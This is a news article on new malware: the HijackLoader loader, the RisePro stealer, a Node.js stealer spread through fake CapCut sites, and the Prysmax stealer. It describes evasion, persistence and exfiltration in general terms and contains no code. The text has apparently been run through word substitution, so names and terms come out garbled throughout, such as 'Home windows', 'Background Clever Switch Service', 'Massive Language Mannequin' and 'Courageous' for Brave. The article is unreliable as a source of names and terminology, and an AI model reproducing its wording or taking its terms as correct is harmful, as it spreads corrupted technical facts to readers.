A brand new malware loader referred to as HijackLoader is gaining traction among the many cybercriminal group to ship numerous payloads akin to DanaBot, SystemBC, and RedLine Stealer.
“Though HijackLoader doesn’t include superior options, it’s able to utilizing a wide range of modules for code injection and execution because it makes use of a modular structure, a characteristic that the majority loaders would not have,” Zscaler ThreatLabz researcher Nikolaos Pantazopoulos mentioned.
First noticed by the corporate in July 2023, the malware employs numerous methods to fly beneath the radar. This entails utilizing syscalls to evade monitoring from security options, monitoring processes related to security software program based mostly on an embedded blocklist, and pushing aside code execution by as a lot as 40 seconds at totally different phases.
The precise preliminary entry vector used to infiltrate targets is presently not recognized. The anti-analysis elements however, the loader packs in a most important instrumentation module that facilitates versatile code injection and execution utilizing embedded modules.
Persistence on the compromised host is achieved by making a shortcut file (LNK) within the Home windows Startup folder and pointing it to a Background Clever Switch Service (BITS) job.
“HijackLoader is a modular loader with evasion methods, which supplies a wide range of loading choices for malicious payloads,” Pantazopoulos mentioned. “Furthermore, it doesn’t have any superior options and the standard of the code is poor.”
The disclosure comes as Flashpoint disclosed particulars of an up to date model of an information-stealing malware referred to as RisePro that was beforehand distributed through a pay-per-install (PPI) malware downloader service dubbed PrivateLoader.
“The vendor claimed of their advertisements that they’ve taken the very best elements of ‘RedLine’ and ‘Vidar’ to make a strong stealer,” Flashpoint famous. “And this time, the vendor additionally guarantees a brand new benefit for customers of RisePro: prospects host their very own panels to make sure logs should not stolen by the sellers.”
RisePro, written in C++, is designed to reap delicate info on contaminated machines and exfiltrate it to a command-and-control (C&C) server within the type of logs. It was first supplied on the market in December 2022.
It additionally follows the invention of a brand new info stealer written in Node.js that is packaged into an executable and distributed through malicious Massive Language Mannequin (LLM)-themed Fb advertisements and bogus web sites impersonating ByteDance’s CapCut video editor.
“When the stealer is executed, it runs its most important operate that steals cookies and credentials from a number of Chromium-based net browsers, then exfiltrates the info to the C&C server and to the Telegram bot,” security researcher Jaromir Horejsi mentioned.
“It additionally subscribes the shopper to the C&C server operating GraphQL. When the C&C server sends a message to the shopper, the stealing operate will run once more.” Focused browsers embody Google Chrome, Microsoft Edge, Opera (and OperaGX), and Courageous.
That is the second time faux CapCut web sites have been noticed delivering stealer malware. In Might 2023, Cyble uncovered two totally different assault chains that leveraged the software program as a lure to trick unsuspecting customers into operating Offx Stealer and RedLine Stealer.
The developments paint an image of a always evolving cybercrime ecosystem, with stealer infections appearing as a major preliminary assault vector utilized by risk actors to infiltrate organizations and conduct post-exploitation actions.
It is subsequently not shocking that risk actors are leaping on the bandwagon to spawn new stealer malware strains akin to Prysmax that incorporate a Swiss Military knife of functionalities that allow their prospects to maximise their attain and impression.
“The Python-based malware is packed utilizing Pyinstaller, which can be utilized to bundle the malicious code and all its dependencies right into a single executable,” Cyfirma mentioned. “The knowledge stealing malware is concentrated on disabling Home windows Defender, manipulating its settings, and configuring its personal response to threats.”
“It additionally makes an attempt to scale back its traceability and keep a foothold on the compromised system. The malware seems to be well-designed for knowledge theft and exfiltration, whereas evading detection by security instruments in addition to dynamic evaluation sandboxes.”
